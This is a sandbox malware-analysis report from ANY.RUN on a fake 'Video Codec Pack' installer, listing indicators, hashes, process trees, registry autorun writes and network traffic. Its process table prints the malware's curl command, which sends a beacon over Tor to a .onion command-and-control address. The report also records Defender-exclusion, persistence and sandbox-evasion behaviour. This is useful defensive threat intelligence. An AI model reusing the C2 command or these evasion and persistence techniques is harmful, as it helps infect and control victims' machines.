File name:

xmpg_codec.exe

Full analysis: https://app.any.run/tasks/90efe399-fff2-4e3b-b09f-f09ef1a01eec
Verdict: Malicious activity
Analysis date: December 12, 2024, 10:52:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 11 sections
MD5:

3A7F402303B1A355BB2044D25502B9F6

SHA1:

D63A9324E3E544CAB121C456EFCFACAC0708AA54

SHA256:

9C1A0608BAE991AF50096ACAEC9D979DF9F9A3BB6E89D9D20972D6CFEB9582BB

SSDEEP:

98304:mrq3Bdwb7ra9MwctZHhlAsHqAgQk98AR8gybf3j6PsfZiCIDKmtp0SMBkPE6c+6s:hddGcMW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • xmpg_codec.tmp (PID: 6648)
      • cmd.exe (PID: 7072)

    • Changes the autorun value in the registry

      • xmpg_codec.tmp (PID: 6648)

    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 6600)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 6600)

    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 6600)

    • Accesses BIOS(Win32_BIOS, may evade sandboxes) via WMI (SCRIPT)

      • wscript.exe (PID: 6600)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • xmpg_codec.tmp (PID: 6456)

    • Executable content was dropped or overwritten

      • xmpg_codec.exe (PID: 6432)
      • xmpg_codec.exe (PID: 6620)
      • xmpg_codec.tmp (PID: 6648)

    • Reads the Windows owner or organization settings

      • xmpg_codec.tmp (PID: 6648)

    • Starts CMD.EXE for commands execution

      • xmpg_codec.tmp (PID: 6648)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6600)

    • The process executes JS scripts

      • cmd.exe (PID: 5432)

    • Connects to unusual port

      • tor.exe (PID: 2380)

    • Executes WMI query (SCRIPT)

      • wscript.exe (PID: 6600)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 6600)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6600)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 7072)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7072)

    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 6600)

  • INFO

    • Checks supported languages

      • xmpg_codec.exe (PID: 6432)
      • xmpg_codec.tmp (PID: 6456)
      • xmpg_codec.exe (PID: 6620)
      • xmpg_codec.tmp (PID: 6648)
      • curl.exe (PID: 5096)

    • Reads the computer name

      • xmpg_codec.exe (PID: 6620)
      • xmpg_codec.tmp (PID: 6456)
      • xmpg_codec.tmp (PID: 6648)
      • tor.exe (PID: 2380)

    • Process checks computer location settings

      • xmpg_codec.tmp (PID: 6456)

    • Create files in a temporary directory

      • xmpg_codec.exe (PID: 6432)

    • Creates files in the program directory

      • xmpg_codec.tmp (PID: 6648)

    • Creates a software uninstall entry

      • xmpg_codec.tmp (PID: 6648)

    • The process uses the downloaded file

      • powershell.exe (PID: 7128)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7128)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7128)

    • Reads the machine GUID from the registry

      • tor.exe (PID: 2380)

    • Creates files or folders in the user directory

      • tor.exe (PID: 2380)

    • Execution of CURL command

      • wscript.exe (PID: 6600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Inno Setup installer (53.5)
.exe | InstallShield setup (21)
.exe | Win32 EXE PECompact compressed (generic) (20.2)
.exe | Win32 Executable (generic) (2.1)
.exe | Win16/32 Executable Delphi generic (1)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:07:12 07:26:53+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 685056
InitializedDataSize: 159744
UninitializedDataSize: -
EntryPoint: 0xa83bc
OSVersion: 6.1
ImageVersion: -
SubsystemVersion: 6.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: This installation was built with Inno Setup.
CompanyName: MMPEG LAB
FileDescription: Video Codec Pack Setup
FileVersion:
LegalCopyright:
OriginalFileName:
ProductName: Video Codec Pack
ProductVersion: 1.5
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
147
Monitored processes
15
Malicious processes
5
Suspicious processes
3

Behavior graph

Click at the process to see the details
start xmpg_codec.exe xmpg_codec.tmp no specs xmpg_codec.exe xmpg_codec.tmp cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wscript.exe no specs tor.exe conhost.exe no specs curl.exe no specs conhost.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2380"C:\Program Files (x86)\Controller\tor.exe" C:\Program Files (x86)\Controller\tor.exe
wscript.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\program files (x86)\controller\tor.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
2428\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execurl.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3876C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
4932\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exetor.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5096"C:\Windows\System32\curl.exe" -X POST -d "GUID=null&action=GUID" --socks5-hostname localhost:9050 http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion/route.php -o C:\Users\admin\AppData\Local\Temp\cfileC:\Windows\SysWOW64\curl.exewscript.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
97
Version:
8.4.0
Modules
Images
c:\windows\syswow64\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\rpcrt4.dll
5432"cmd.exe" /C wscript.exe "C:/Program Files (x86)/Controller/ntdlg.js"C:\Windows\SysWOW64\cmd.exexmpg_codec.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6200\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6432"C:\Users\admin\Desktop\xmpg_codec.exe" C:\Users\admin\Desktop\xmpg_codec.exe
explorer.exe
User:
admin
Company:
MMPEG LAB
Integrity Level:
MEDIUM
Description:
Video Codec Pack Setup
Exit code:
0
Version:
Modules
Images
c:\users\admin\desktop\xmpg_codec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comctl32.dll
6456"C:\Users\admin\AppData\Local\Temp\is-DSS32.tmp\xmpg_codec.tmp" /SL5="$902A4,3265534,845824,C:\Users\admin\Desktop\xmpg_codec.exe" C:\Users\admin\AppData\Local\Temp\is-DSS32.tmp\xmpg_codec.tmpxmpg_codec.exe
User:
admin
Company:
MMPEG LAB
Integrity Level:
MEDIUM
Description:
Setup/Uninstall
Exit code:
0
Version:
51.1052.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-dss32.tmp\xmpg_codec.tmp
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comdlg32.dll
6600wscript.exe "C:/Program Files (x86)/Controller/ntdlg.js"C:\Windows\SysWOW64\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
7 197
Read events
7 177
Write events
20
Delete events
0

Modification events

(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Controller
Value:
"C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\Controller\ntdlg.js"
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: Setup Version
Value:
6.3.3
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: App Path
Value:
C:\Program Files (x86)\Controller
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:InstallLocation
Value:
C:\Program Files (x86)\Controller\
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: Icon Group
Value:
Video Codec Pack
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: User
Value:
admin
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: Language
Value:
english
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:DisplayName
Value:
Video Codec Pack version 1.5
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:UninstallString
Value:
"C:\Program Files (x86)\Controller\unins000.exe"
(PID) Process:(6648) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:QuietUninstallString
Value:
"C:\Program Files (x86)\Controller\unins000.exe" /SILENT
Executable files
7
Suspicious files
2
Text files
19
Unknown types
0

Dropped files

PID
Process
Filename
Type
6648xmpg_codec.tmpC:\Users\admin\AppData\Local\Temp\is-2D70K.tmp\_isetup\_setup64.tmpexecutable
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
6432xmpg_codec.exeC:\Users\admin\AppData\Local\Temp\is-DSS32.tmp\xmpg_codec.tmpexecutable
MD5:54740ECCF642110ADEF58C56251FEE80
SHA256:CAB8BC9FFAC294E2B2199305117582BBA6524F2C829C548961D65F18F97B934C
6648xmpg_codec.tmpC:\Program Files (x86)\Controller\ntdlg.jstext
MD5:864BEFD925D922F91750256D5348EDA1
SHA256:2EC555C34F0AF1514501CA5E4D999C843D5B9DE7973467820FCF6034A517C4CC
6648xmpg_codec.tmpC:\Program Files (x86)\Controller\is-CRA0C.tmpexecutable
MD5:5D132FB6EC6FAC12F01687F2C0375353
SHA256:6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8
6648xmpg_codec.tmpC:\Program Files (x86)\Controller\unins000.datbinary
MD5:8E5F8B16A1B78C47D0478318A9186995
SHA256:2D65D61AE41E6D83F758E051F774C03FD28EC050DDEDCE8EAF9DA145B6626A48
6648xmpg_codec.tmpC:\Program Files (x86)\Controller\is-QIABU.tmptext
MD5:864BEFD925D922F91750256D5348EDA1
SHA256:2EC555C34F0AF1514501CA5E4D999C843D5B9DE7973467820FCF6034A517C4CC
6620xmpg_codec.exeC:\Users\admin\AppData\Local\Temp\is-78F5F.tmp\xmpg_codec.tmpexecutable
MD5:54740ECCF642110ADEF58C56251FEE80
SHA256:CAB8BC9FFAC294E2B2199305117582BBA6524F2C829C548961D65F18F97B934C
6648xmpg_codec.tmpC:\Program Files (x86)\Controller\unins000.exeexecutable
MD5:DB518BD52B3ECB5E564836844B8D2D77
SHA256:9F15BCC164656E92075BD3036D47ED264C258031D5B5EFCC216794BEE078A4BF
6648xmpg_codec.tmpC:\Program Files (x86)\Controller\tor.exeexecutable
MD5:5D132FB6EC6FAC12F01687F2C0375353
SHA256:6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8
2380tor.exeC:\Users\admin\AppData\Roaming\tor\cached-certs.tmptext
MD5:6C014C899A7C48E072E250645E4D6166
SHA256:8A733970CC86F2D73D91760AE143B70382F2742D35526387B4949EB5D05E71C2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
37
DNS requests
19
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7136
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7136
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6340
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3220
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5064
SearchApp.exe
2.23.209.164:443
www.bing.com
Akamai International B.V.
GB
whitelisted
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
20.190.159.73:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
  • 4.231.128.59
whitelisted
google.com
  • 172.217.23.110
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.106
whitelisted
www.bing.com
  • 2.23.209.164
  • 2.23.209.163
  • 2.23.209.171
  • 2.23.209.168
  • 2.23.209.173
  • 2.23.209.166
  • 2.23.209.162
  • 2.23.209.167
  • 2.23.209.169
  • 2.23.209.139
  • 2.23.209.140
  • 2.23.209.135
  • 2.23.209.133
  • 2.23.209.142
  • 2.23.209.137
  • 2.23.209.136
  • 2.23.209.132
  • 2.23.209.131
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
  • 20.190.159.23
  • 20.190.159.68
  • 40.126.31.67
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
fd.api.iris.microsoft.com
  • 20.103.156.88
whitelisted

Threats

PID
Process
Class
Message
2380
tor.exe
Misc Attack
ET TOR Known Tor Exit Node Traffic group 94
2380
tor.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 94
2380
tor.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 280
2380
tor.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 148
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
xmpg_codec.exe